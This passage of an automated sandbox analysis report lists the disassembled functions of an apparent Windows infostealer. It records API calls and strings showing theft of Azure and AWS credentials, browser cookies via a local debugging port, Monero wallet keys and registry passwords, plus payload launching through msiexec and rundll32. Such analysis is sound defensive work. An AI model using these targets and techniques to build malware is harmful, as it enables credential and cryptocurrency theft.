                                      • Part of subcall function 00374B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00374CFC
                                      • Part of subcall function 00374B60: DeleteFileA.KERNEL32(?), ref: 00374D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: fad6c0d7b904f0d45a373474b2f3196f182a6768b6649e683b74f53790707cbf
                                    • Instruction ID: ba4e29cac1e93e8409bba89a1f8ded92133cf204a5b4ee3915b83a8e386b6d00
                                    • Opcode Fuzzy Hash: fad6c0d7b904f0d45a373474b2f3196f182a6768b6649e683b74f53790707cbf
                                    • Instruction Fuzzy Hash: B34186BA94430467DB65F770EC97FDD733C5B54700F408594B649690C1EEB86BC88B92
                                    Function 00373080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00373415
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 003735AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0037373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: ba0256f23c60c3cef97f7ff95a96b15462d3f2588871c84807460474f30dca32
                                    • Instruction ID: 2b20f6fde52e67d97bf97f38a805d704f18081ae5a1f98b9f2920498c46d7f80
                                    • Opcode Fuzzy Hash: ba0256f23c60c3cef97f7ff95a96b15462d3f2588871c84807460474f30dca32
                                    • Instruction Fuzzy Hash: 2E1224719105089ADB2AFB90DDA2FEDB779AF54300F10C599F10B6A191EF382B49CF61
                                    Function 00369BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00369A50: InternetOpenA.WININET(00380AF6,00000001,00000000,00000000,00000000), ref: 00369A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00369CAF
                                    • lstrcat.KERNEL32(?,003812C4), ref: 00369CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00369CD5
                                    • lstrcat.KERNEL32(?,003812C8), ref: 00369CE7
                                    • lstrcat.KERNEL32(?,?), ref: 00369CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00369D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00369D17
                                    • lstrlen.KERNEL32(00000000), ref: 00369D26
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: b8c0487ebc5bce18f9055da6710746e0a7e9d4ff3dfa52db0ecd798a37b60542
                                    • Instruction ID: f7adebe851d081d136154871a1b20621fccf3f3bf3a9de4548e49dbdf1674afc
                                    • Opcode Fuzzy Hash: b8c0487ebc5bce18f9055da6710746e0a7e9d4ff3dfa52db0ecd798a37b60542
                                    • Instruction Fuzzy Hash: A75176B1810608ABDB15EBE0DC55FEE733CAF44301F409558F50AAB095EF756A49CF61
                                    Function 00375510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 003662D0: InternetOpenA.WININET(00380DFF,00000001,00000000,00000000,00000000), ref: 00366331
                                      • Part of subcall function 003662D0: StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00366353
                                      • Part of subcall function 003662D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00366385
                                      • Part of subcall function 003662D0: HttpOpenRequestA.WININET(00000000,GET,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 003663D5
                                      • Part of subcall function 003662D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0036640F
                                      • Part of subcall function 003662D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00366421
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375568
                                    • lstrlen.KERNEL32(00000000), ref: 0037557F
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 003755B4
                                    • lstrlen.KERNEL32(00000000), ref: 003755D3
                                    • lstrlen.KERNEL32(00000000), ref: 003755FE
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 44fdac0b4d9ff82f9f40c1ddb5bcda4f8b1ca1790105d7a279eb6aa0fe4c7a9f
                                    • Instruction ID: 886f72aa444f48c0e75f697ca3e8a9553dacd9b532b2503ffd6abc5c0e2bbe72
                                    • Opcode Fuzzy Hash: 44fdac0b4d9ff82f9f40c1ddb5bcda4f8b1ca1790105d7a279eb6aa0fe4c7a9f
                                    • Instruction Fuzzy Hash: 13510A709105489BCB2AFF60CDA6AED7779AF90340F50C468E50E5F592EB386B05CB62
                                    Function 00371520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 1f0592b763489a2016f1cdd07616195e57c427eec18bfe28bcab6ddf945f1d35
                                    • Instruction ID: 7a534d0a28ba81586354fc06816eb33ef0c68abaec5784c986f92ab47f223e50
                                    • Opcode Fuzzy Hash: 1f0592b763489a2016f1cdd07616195e57c427eec18bfe28bcab6ddf945f1d35
                                    • Instruction Fuzzy Hash: 99C1B4B69001099BCB25EF60DC99FDE73B9AF54304F008599F50EAB241DB74EA85CF91
                                    Function 003744D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0037453C
                                    • lstrcat.KERNEL32(?,00F3DB48), ref: 0037455B
                                    • lstrcat.KERNEL32(?,?), ref: 0037456F
                                    • lstrcat.KERNEL32(?,00F3CEC8), ref: 00374583
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 00378F20: GetFileAttributesA.KERNEL32(00000000,?,00361B94,?,?,0038577C,?,?,00380E22), ref: 00378F2F
                                      • Part of subcall function 0036A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0036A489
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                      • Part of subcall function 00379550: GlobalAlloc.KERNEL32(00000000,0037462D,0037462D), ref: 00379563
                                    • StrStrA.SHLWAPI(?,00F3DDD0), ref: 00374643
                                    • GlobalFree.KERNEL32(?), ref: 00374762
                                      • Part of subcall function 0036A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A23F
                                      • Part of subcall function 0036A210: LocalAlloc.KERNEL32(00000040,?,?,?,00364F3E,00000000,?), ref: 0036A251
                                      • Part of subcall function 0036A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A27A
                                      • Part of subcall function 0036A210: LocalFree.KERNEL32(?,?,?,?,00364F3E,00000000,?), ref: 0036A28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 003746F3
                                    • StrCmpCA.SHLWAPI(?,003808D2), ref: 00374710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00374722
                                    • lstrcat.KERNEL32(00000000,?), ref: 00374735
                                    • lstrcat.KERNEL32(00000000,00380FA0), ref: 00374744
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: bd42b33c9d6af0aa60d10ed2fa125427e45cde107ce0f56a8b2e1bfa0afb3e00
                                    • Instruction ID: b7f12f231234c655b3df1e19a1a4bdb5e091a84ea2b03a8ad138382cfc35e5dc
                                    • Opcode Fuzzy Hash: bd42b33c9d6af0aa60d10ed2fa125427e45cde107ce0f56a8b2e1bfa0afb3e00
                                    • Instruction Fuzzy Hash: 907157B6900208ABDB25EBB0DD99FDE7379AF88300F048598F619A7141EB34DB44CF91
                                    Function 00361310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003612B4
                                      • Part of subcall function 003612A0: RtlAllocateHeap.NTDLL(00000000), ref: 003612BB
                                      • Part of subcall function 003612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003612D7
                                      • Part of subcall function 003612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003612F5
                                      • Part of subcall function 003612A0: RegCloseKey.ADVAPI32(?), ref: 003612FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0036134F
                                    • lstrlen.KERNEL32(?), ref: 0036135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00361377
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00361465
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 003614EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: e643c528277bdce7e809cd09d63974ceed3e4cddb32ace922a977872de3ae8cb
                                    • Instruction ID: 041f1bdde758071703923790a8f19866c9801a63e22b559ae88b9ca1723aea1f
                                    • Opcode Fuzzy Hash: e643c528277bdce7e809cd09d63974ceed3e4cddb32ace922a977872de3ae8cb
                                    • Instruction Fuzzy Hash: 325153B1D505195BCB26FB60DDA2FED737C9B54300F4085D8B60E66092EE346B88CFA6
                                    Function 00369A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenA.WININET(00380AF6,00000001,00000000,00000000,00000000), ref: 00369A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00369AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00369AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: ae1cd203291b4d108ef8ca77addd2aa7eae8e4432cb337d336e403e2cd944d98
                                    • Instruction ID: 0ecd1efee432f7f34d519953b3a3db7b6cd1362a867203b9e97ee79224e8eea7
                                    • Opcode Fuzzy Hash: ae1cd203291b4d108ef8ca77addd2aa7eae8e4432cb337d336e403e2cd944d98
                                    • Instruction Fuzzy Hash: 7D414F75A50218EFDB2AEF90CC95FDD77B8BB48740F108199F509AB194DBB4AE80CB50
                                    Function 00367630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00367330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0036739A
                                      • Part of subcall function 00367330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00367411
                                      • Part of subcall function 00367330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0036746D
                                      • Part of subcall function 00367330: GetProcessHeap.KERNEL32(00000000,?), ref: 003674B2
                                      • Part of subcall function 00367330: HeapFree.KERNEL32(00000000), ref: 003674B9
                                    • lstrcat.KERNEL32(00000000,0038192C), ref: 00367666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 003676A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 003676BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 003676EF
